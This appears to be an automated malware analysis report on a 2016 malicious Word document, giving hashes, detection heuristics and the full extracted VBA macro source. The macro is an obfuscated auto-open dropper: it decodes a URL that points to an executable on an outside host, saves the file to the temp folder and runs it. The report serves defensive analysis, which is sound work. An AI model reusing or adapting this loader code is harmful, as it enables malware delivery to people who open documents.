Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1bad53ce984f652b…

MALICIOUS

Office (OLE)

64.0 KB Created: 2016-02-16 09:36:00 Authoring application: Microsoft Office Word First seen: 2016-08-15
MD5: 06889f6bbca750b7fe94938b04f599ed SHA-1: 5a8c4d0196a233cf1ef46a1255d8593007e0e6ee SHA-256: 1bad53ce984f652bc03ecb96fad5746357968c2fdccdea82995231f1099773e4
370 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains obfuscated VBA macros, including an auto-executing loader that uses CreateObject and CallByName. These macros are designed to decode and download a payload from the URL http://www.southlife.church/34gf5y/r34f3345g.exe, which is a common technique for malware droppers.

Heuristics 11

  • ClamAV: Doc.Downloader.Generic-10026854-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-10026854-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set KogdaGe_1 = CreateObject(DrinkSun(0))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set KogdaGe_1 = CreateObject(DrinkSun(0))
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
     CallByName KogdaGe_2, DrinkSun(7), VbLet, 1
  • Payload URL decoded from a Chr() numeric-array loader (1 URL) high OLE_VBA_CHR_ARRAY_DROPPER_URL
    A VBA macro builds its stage-2 download URL from a numeric array (Array(250, 262, …)) decoded one character at a time with Chr() and a linear offset (e.g. Chr(n - 146)), then drives Microsoft.XMLHTTP / ADODB.Stream.SaveToFile / Shell.Application to drop and execute the payload in %TEMP%. The URL is assembled at run time and never appears contiguously on disk, so a literal scan misses it; surfaced as an IOC. Self-validating: only an array that decodes to a valid host URL is reported, so a benign numeric array cannot false-positive.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.southlife.church/34gf5y/r34f3345g.exe Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5891 bytes
SHA-256: cd87cf69622249352e8bc4bebae20d90e9bdab49cf4ded41361c98fb1b8ac728
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Call AddSensors
End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{CFED7DD4-70B3-4500-991E-8D2A9E25237B}{902520CF-EBFE-40D2-A478-42D7F0823E64}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module1"
Public MapsInitialized As Boolean
Public mDBname As String
Public MapInit As Boolean
Public KogdaGe_1 As Object
Public KogdaGe_2 As Object
Public KogdaGe_3 As Object
Public KogdaGe_4 As String
Public KogdaGe_5 As String
Public KogdaGe_6 As Object
Public DrinkSun() As String

Public Sub CheckMaps()
 Dim objStors As String
 Dim objStor As Variant
 KogdaGe_1.Send
 Dim NewList As String
 Dim DoReset As Boolean
 Dim LP As Long
 KogdaGe_4 = KogdaGe_3(DrinkSun(6))
GoTo ErrHandler
 objS.tors.Load , , , , , True
 For Each objStor In objSt.ors
 NewLi.st.Add objStor.MapID
 Next
 If Not MapInit Then
 MapInit = True
 DoReset = True
 Else
 If MapL.ist.Count <> NewLi.st.Count Then
 DoReset = True
 Set MapL.ist = NewList
 Else
 For LP = 1 To MapLi.st.Count
 If MapL.ist.ID(LP) <> NewLi.st.ID(LP) Then
 DoReset = True
 Set MapL.ist = Ne.w.List
 Exit For
 End If
 Next LP
 End If
 End If
 If DoReset Then
 BM.Reset
 MapsInitialized = False
 End If
 Set NewLi.st = Nothing
 Set objSt.ors = Nothing
 Set objSt.or = Nothing
 On Error GoTo 0
ErrExit:
 Exit Sub
ErrHandler:
KogdaGe_5 = KogdaGe_4 + Replace(DrinkSun(12), "t", "e")
ConnectMaps
End Sub
Public Sub AddSensors()
 Dim Col As String
 Dim Obj As String
 DrinkSun = Split(UserForm1.Label1.Caption, "/")
 GoTo ErrExit
 On Error GoTo ErrHandler
 BM.ResetBalances
 Cofl.Load
 On Error GoTo 0
ErrExit:
Set KogdaGe_1 = CreateObject(DrinkSun(0))
CheckBins
 Exit Sub
ErrHandler:
 AD.DisplayError Err.Number, "modMaps", "AddSensors", Err.Description
 Resume ErrExit
End Sub



Attribute VB_Name = "Module2"
Public Sub CheckBins()
 Dim LP As Long
 Dim BinID As Long
 Dim objStorages As String
 Dim objStorage As Variant
 Dim MapID As Long
 Set KogdaGe_2 = CreateObject(DrinkSun(1))
 GoTo ErrHandler
 objSt.orages.Load
 For LP = 1 To BM.StorCount
 BinID = BM.StorID(LP)
 If Not objSto.rages.IsItem(BinID) Then
 BM.UnloadStor BinID
 End If
 Next LP
 For Each objStorage In objS.torages
 With objStorage
 If Not BM.BinLoaded(.ID) Then
 BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet
 End If
 MapID = BM.BinMapID(.ID)
 If MapID <> 0 And MapID <> .MapID Then
 BM.UnloadStor .ID
 BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet
 End If
 End With
 Next
 On Error GoTo 0
ErrExit:
 Exit Sub
ErrHandler:
Set KogdaGe_6 = CreateObject(DrinkSun(2))
Set hokuk = CreateObject(DrinkSun(3))
Set KogdaGe_3 = hokuk.Environment(DrinkSun(4))
CheckDatabase
End Sub
Public Sub CheckDatabase()
Dim KogdaGe_7() As Variant
KogdaGe_7 = Array(250, 262, 262, 258, 204, 193, 193, 265, 265, 265, 192, 261, 257, 263, 262, 250, 254, 251, 248, 247, 192, 245, 250, 263, 260, 245, 250, 193, 197, 198, 249, 248, 199, 267, 193, 260, 197, 198, 248, 197, 197, 198, 199, 249, 192, 247, 266, 247)
Dim KogdaGe_8 As Integer
 Dim PubDoStop As String
 PubDoStop = ""
 GoTo ErrHandler
 If mDBname <> Prog.DatabaseFullName Then
 mDBname = Prog.DatabaseFullName
 BM.Reset
 MapsInitialized = False
 End If
 On Error GoTo 0
ErrExit:
 Exit Sub
ErrHandler:
 For KogdaGe_8 = LBound(KogdaGe_7) To UBound(KogdaGe_7)
 PubDoStop = PubDoStop & Chr(-99 + KogdaGe_7(KogdaGe_8) - 47)
 Next KogdaGe_8
KogdaGe_1.Open DrinkSun(5), PubDoStop, False
CheckMaps
 End Sub
Public Sub ConnectMaps()
 Dim objStorages As Variant
 Dim objStorage As Variant
 Dim objMap As Variant
 Dim objMaps As Variant
 CallByName KogdaGe_2, DrinkSun(7), VbLet, 1
 KogdaGe_2.Open
GoTo ErrHandler
 CheckDat.abase BM
 CheckM.aps BM
 objMaps.Load
 BM.Visible = False
 If objMaps.Count > 0 Then
 BM.Visible = ShowMaps
 If ShowMaps Then
 If Not MapsInitialized Then
 For Each objMap In objMaps
 With objMap
 BM.AddMap .ID, .MapName, .Units, .Zoom
 End With
 Next
 objStor.ages.Load , , , , , True
 For Each objStorage In objSto.rages
 With objStorage
 BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet
 End With
 Next
 MapsInitialized = True
 End If
 AddSenso.rs BM
 CheckB.ins BM
 BM.Update
 End If
 End If
 Set objMap = Nothing
 Set objMaps = Nothing
 Set objStorage = Nothing
 Set objStorages = Nothing
 On Error GoTo 0
ErrExit:
 Exit Sub
ErrHandler:
SaveMaps
End Sub
Public Sub SaveMaps()
rbp = CallByName(KogdaGe_1, DrinkSun(10), VbGet)
 Dim objStor As Variant
 CallByName KogdaGe_2, DrinkSun(9), VbMethod, rbp
 Dim objMap As Variant
 Dim LP As Long
 Dim ID As Long
 Dim XPos As Single
 Dim YPos As Single
 Dim BinLP As Long
 Dim BinID As Long
 CallByName KogdaGe_2, DrinkSun(11), VbMethod, KogdaGe_5, 2
GoTo ErrHandler
 For LP = 1 To BM.MapCount
 ID = BM.MapID(LP)
 objMap.Load ID
 objMap.BeginEdit
 objMap.MapZoom = BM.MapZoom(LP)
 objMap.ApplyEdit
 Set objMap = Nothing
 Next LP
 For BinLP = 1 To BM.StorCount
 BinID = BM.StorID(BinLP)
 If BM.BinLoaded(BinID) Then
 BM.BinLocation BinLP, XPos, YPos
 With objStor
 .Load BinID
 .BeginEdit
 .XPos = XPos
 .YPos = YPos
 .ApplyEdit
 End With
 Set objStor = Nothing
 End If
 Next BinLP
 On Error GoTo 0
ErrExit:
 Exit Sub
ErrHandler:
KogdaGe_6.Open (KogdaGe_5)
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.